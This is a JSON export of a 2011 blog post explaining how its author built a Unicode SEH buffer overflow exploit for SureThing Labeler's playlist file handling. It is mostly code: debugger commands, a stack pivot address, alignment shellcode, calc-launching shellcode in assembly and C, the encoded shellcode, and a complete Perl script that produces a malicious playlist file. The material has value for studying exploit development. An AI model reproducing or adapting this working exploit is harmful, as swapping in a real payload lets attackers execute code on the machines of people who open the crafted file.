{"id":307,"date":"2011-08-02T23:24:43","date_gmt":"2011-08-02T22:24:43","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=307"},"modified":"2013-03-20T22:17:20","modified_gmt":"2013-03-20T21:17:20","slug":"surething-labeler-playlist-buffer-overflow-unicode-exploit","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=307","title":{"rendered":"SureThing Labeler Playlist Buffer Overflow UNICODE Exploit"},"content":{"rendered":"

This vulnerability I had discovered a couple of years ago but never got round in writing an exploit for it till recently after studying Peter Van Eeckhoutte’s excellent exploit writing tutorial “Unicode \u2013 from 0\u00d700410041 to calc”. In this vulnerability when data is parsed from the playlist file it gets converted to Unicode before being placed on the stack. That is why we see the hex values of 0x00410041 instead of 0x4141 when say AA is parsed.<\/p>\n

So what is Unicode? Well it is a standard for encoding characters. There are various types of Unicode using 8, 16 or 32 bits (UTF-8, UTF-16 or UTF-32). UTF-16 is the most common encoding scheme and the one used for native Unicode encoding on Windows operating systems. The reason why Unicode is used is that say with 2 bytes (16 bits) it gives us 65,536 (2^16) possible combinations covering every single character, symbols, etc of all the languages around the world. If ASCII was used then we would be only limited to 128 possible combinations (2^7) as it uses 7 bits for each character.<\/p>\n

For this vulnerability the offsets are shown below:<\/p>\n

[BUFFER x 264 bytes] + [NSEH] + [SEH] + [BUFFER x 227]<\/p>\n

Since this is a Unicode buffer overflow vulnerability we have only 2 bytes each for our SEH pointers. Opening the executable or attaching the process in Immunity Debugger and then using the mona.py script we can run a number of commands<\/p>\n

To list out all modules loaded filtering out the OS modules\u00a0<\/p>\n

>!mona modules -cm os=false<\/pre>\n
\u00a0\"\"<\/a><\/p>\n
\u00a0To list out all pointers that could be used in our SEH overwrite using the “seh” command<\/p>\n
>!mona seh -cp unicode -cm rebase=true,aslr=false,safeseh=false,nx=false<\/pre>\n
\u00a0
\nUnfortunately a couple of addresses that had been found did point back to our NSEH but could not walk through as an exception was triggered.<\/p>\n
Turning to the “stackpivot” command listed a number of possible addresses. After a testing a few addresses one of them worked perfectly, pointing back to NSEH and walking through without raising any exceptions.<\/p>\n
>!mona stackpivot -cp unicode -cm rebase=true,aslr=false,safeseh=false,nx<\/pre>\n
0x002f00c8 :\u00a0{pivot 24}\u00a0# POP EDI # POP ESI # POP EBX # ADD ESP,0C # RETN<\/pre>\n
This address 0x002f00c8\u00a0found in module LTIMG13N.dll does take us back to our NSEH pointer not before running through some unwanted instructions but did not do any harm to our stack.
\nBelow we can see our SEH address and the instructions it carries out. After landing back to our NSEH we see the instructions further below as it walks through.<\/p>\n
# SEH address instructions<\/pre>\n
002F00C8\u00a0\u00a0 5F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 POP EDI\r\n002F00C9\u00a0\u00a0 5E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 POP ESI\r\n002F00CA\u00a0\u00a0 5B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 POP EBX\r\n002F00CB\u00a0\u00a0 83C4 0C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ADD ESP,0C\r\n002F00CE\u00a0\u00a0 C3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 RETN<\/pre>\n
 <\/p>\n
# NSEH and SEH walk instructions<\/pre>\n
0013beb4   41\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  inc\u00a0\u00a0\u00a0\u00a0 ecx\r\n0013beb5   004100\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  add\u00a0\u00a0\u00a0\u00a0 byte ptr [ecx],al\r\n0013beb8   c8002f00\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  enter\u00a0\u00a0 2F00h,0<\/pre>\n
\u00a0
\nOnce gone through these instructions we need to place some venetian shellcode to align our chosen base register required for our unicoded shellcode. After walking through the previous instructions our EBX register now points near to our buffer so we use this to our advantage (EBX + 30h). The venetian shellcode below aligns EAX to point to our shellcode. In this case it points to the buffer area before SEH pointers. To be precise 8 bytes from the start. The reason being is that we have more space to play with than after the SEH pointers.<\/p>\n
# 15 bytes of venetion shellcode<\/pre>\n
\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# put the address ebx on stack\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al\u00a0# align\r\n\"\\x58\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # pop eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# get address of ebx place in eax\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al\u00a0# align\r\n\"\\x05\\x01\\x30\". # add eax, 0x30000100\u00a0\u00a0\u00a0# align and add to eax\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al\u00a0# align\r\n\"\\x2d\\x03\\x30\". # sub eax, 0x30000300\u00a0\u00a0\u00a0# align and sub to eax dec by 200\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al\u00a0# align\r\n\"\\x50\". \u00a0       # push eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# push eax in stack\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al\u00a0# align\r\n\"\\xc3\"; \u00a0       # retn\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# call eax<\/pre>\n
 <\/p>\n
The image shows our instructions with nulls.<\/p>\n
\"\"<\/a><\/p>\n
So now our offsets are like this<\/p>\n
[8 bytes] + [256 bytes for our unicode shellcode] + [NSEH] + [SEH] + [VENETIAN SHELLCODE]<\/p>\n
256 bytes is still not a great deal of space for a decent piece of shellcode so I’m using a custom shellcode with hardcoded addresses. There are other ways like using an egghunter shellcode in this space and then placing shellcode somewhere in memory but for this POC exploit Im not using an egghunter shellcode.<\/p>\n
Using the Netwide Assembler tools the assembled the code below outputs to file shellcalc.bin<\/p>\n
>nasmw -f bin -o shellcalc.bin shellcalc.asm<\/pre>\n
[BITS 32]\r\npush byte 0\r\npush dword \"\u00a0\u00a0\u00a0 \"\r\npush dword \"calc\"\r\nmov\u00a0 eax,esp\r\npush eax\r\nmov\u00a0 eax,0x7c86250d\u00a0\u00a0 ; WinExec() WinXP SP3 kernel32.dll\r\ncall eax\r\nxor\u00a0 eax,eax\r\npush eax\r\nmov\u00a0 eax,0x77c39e7e\u00a0\u00a0 ; exit() WinXP SP3 msvcrt.dll\r\ncall eax<\/pre>\n
 <\/p>\n
Once assembled we can disassemble shellcalc.bin to obtain our opcodes<\/p>\n
>ndisasmw shellcalc.bin -b 32<\/pre>\n
00000000\u00a0 6A00\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push byte +0x0\r\n00000002\u00a0 6820202020\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x20202020\r\n00000007\u00a0 6863616C63\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x636c6163\r\n0000000C\u00a0 89E0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,esp\r\n0000000E\u00a0 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push eax\r\n0000000F\u00a0 B80D25867C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c86250d\r\n00000014\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000016\u00a0 31C0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor eax,eax\r\n00000018\u00a0 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push eax\r\n00000019\u00a0 B87E9EC377\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x77c39e7e\r\n0000001E\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax<\/pre>\n
 <\/p>\n
Finally to test our shellcode we can compile the C code below to see if our shellcode works<\/p>\n
#include <stdio.h>\r\n#include <windows.h><\/pre>\n
unsigned char shell[] =\r\n\"\\x6A\\x00\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ push byte 0\r\n\"\\x68\\x20\\x20\\x20\\x20\"\u00a0\u00a0\u00a0 \/\/ push dword \"\u00a0\u00a0\u00a0 \"\r\n\"\\x68\\x63\\x61\\x6c\\x63\"\u00a0\u00a0\u00a0 \/\/ push dword calc\r\n\"\\x8B\\xC4\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ mov\u00a0 eax,esp\r\n\"\\x50\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ push eax\r\n\"\\xB8\\x0d\\x25\\x86\\x7c\"\u00a0\u00a0\u00a0 \/\/ mov\u00a0 eax,0x7c86250d\r\n\"\\xFF\\xD0\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ call eax\r\n\"\\x31\\xc0\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ xor\u00a0 eax,eax\r\n\"\\x50\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ push eax\r\n\"\\xB8\\x7e\\x9e\\xC3\\x77\"\u00a0\u00a0\u00a0 \/\/ mov\u00a0 eax,0x77c39e7e\r\n\"\\xFF\\xD0\";\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ call eax<\/pre>\n
int main()\r\n{\r\n\u00a0 HINSTANCE LibHandle;\r\n  int (*funct)();\r\n\u00a0 LibHandle = LoadLibrary(\"msvcrt.dll\");\r\n\u00a0 printf(\"\\nShellcode size is: %d bytes\\n\", sizeof(shell)-1);\r\n\u00a0 printf(\"\\nRunning shellcode . . .\\n\\n\");\r\n\u00a0 funct = (int (*)()) shell;\r\n\u00a0 (int)(*funct)();\r\n\u00a0 return 0;\r\n}<\/pre>\n
 <\/p>\n
Once our shellcode has ran successfully loading Windows Calculator we can convert this shellcode to unicode. To do this we use Skylined alpha2.exe tool<\/p>\n
>alpha2 --unicode eax < shellcalc.bin<\/pre>\n
 <\/p>\n
This outputs to screen our ascii shellcode that when entered in the stack it gets converted to unicode. The size of this shellcode is now 189 bytes from our original 32 bytes of shellcode.<\/p>\n
So our final layout is like this<\/p>\n
[8 bytes] + [189 bytes unicode shellcode] + [67 bytes] + [NSEH] + [SEH] + [VENETIAN SHELLCODE]<\/p>\n
and our final exploit code in Perl is<\/p>\n
my $file = \"stcdexp.pls\";\r\nmy $nseh = \"\\x41\\x41\";\u00a0\u00a0\u00a0\u00a0\u00a0\r\nmy $seh\u00a0 = \"\\xC8\\x2F\";\u00a0\u00a0\u00a0\u00a0\u00a0\r\nmy $buf1 = \"\\x41\" x 8;\r\nmy $buf2 = \"\\x42\" x 67;\r\nmy $buf3 = \"\\x43\" x 227;\u00a0\u00a0\u00a0 # added at the end but not needed<\/pre>\n
# 15 bytes of venetian shellcode<\/pre>\n
my $venetian =\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # put the address ebx on stack\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x58\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # pop eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # get address of ebx place in eax\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x05\\x01\\x30\". # add eax, 0x30000100\u00a0\u00a0 # align and add to eax\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x2d\\x03\\x30\". # sub eax, 0x30000300\u00a0\u00a0 # align and sub to eax dec by 200\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x50\". \u00a0       # push eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push eax in stack\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\xc3\"; \u00a0       # retn\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax<\/pre>\n
# alpha2 --unicode eax < shellcalc.bin<\/pre>\n
my $shellcode =\r\n\"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA\".\r\n\"LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI\".\r\n\"AIQI111AIAJQYAZBABABABABkMAGB9u4JBpjm0rHMPO0k\".\r\n\"pKpQXrCQQRLc31ywpPPFXLMleQvSLYoVplqWPpPDx1nsn\".\r\n\"i3rWKOFpA\";<\/pre>\n
my $exp = $buf1 . $shellcode . $buf2 . $nseh . $seh . $venetian . $buf3;<\/pre>\n
open($FILE,\">$file\");\r\nprint $FILE $exp;\r\nclose($FILE);\r\nprint \"pls File Created successfully\\n\";<\/pre>\n
 <\/p>\n
This exploit has been tested on the trial version 5.1.616.<\/p>\n
References:<\/p>\n
http:\/\/secunia.com\/advisories\/35361\/<\/a>
\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/dd374081.aspx<\/a>
\nhttp:\/\/www.corelan.be\/index.php\/2009\/11\/06\/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
This vulnerability I had discovered a couple of years ago but never got round in writing an exploit for it till recently after studying Peter Van Eeckhoutte’s excellent exploit writing tutorial “Unicode \u2013 from 0\u00d700410041 to calc”. In this vulnerability when data is parsed from the playlist file it gets converted to Unicode before being […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,7,6],"tags":[29],"class_list":["post-307","post","type-post","status-publish","format-standard","hentry","category-all","category-exploits","category-vulnerabilities","tag-surething"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=307"}],"version-history":[{"count":54,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/307\/revisions"}],"predecessor-version":[{"id":416,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/307\/revisions\/416"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}